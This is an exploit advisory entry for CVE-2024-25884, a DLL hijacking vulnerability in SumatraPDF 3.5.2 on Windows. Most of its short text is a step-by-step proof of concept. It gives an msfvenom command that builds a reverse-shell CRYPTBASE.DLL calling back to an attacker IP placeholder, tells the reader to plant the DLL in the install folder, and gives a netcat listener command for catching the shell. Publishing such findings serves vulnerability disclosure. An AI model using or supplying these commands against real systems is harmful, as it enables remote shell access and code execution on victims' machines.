SumatraPDF 3.5.2 DLL Hijacking

Related Vulnerabilities: CVE-2024-25884  
Publish Date: 04 Mar 2024
                SumatraPDF 3.5.2 DLL Hijack

# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack
# Date: 03.03.2024
# Exploit Author: Krishna Vamshi Katta Rokkaiah
# Vendor Homepage:
# Software Link:
# Version: 3.5.2
# Tested on: Windows 11
# CVE : CVE-2024-25884

In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.

Proof of Concept:

1. Use MSFVenom to create a malicious DLL:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL

2. Copy this file to the Sumatra PDF installation folder:

3. Start a listener in attacking system:
nc -nlvp 7777

4. Start the Sumatra PDF application and notice a reverse shell in the attacking system.
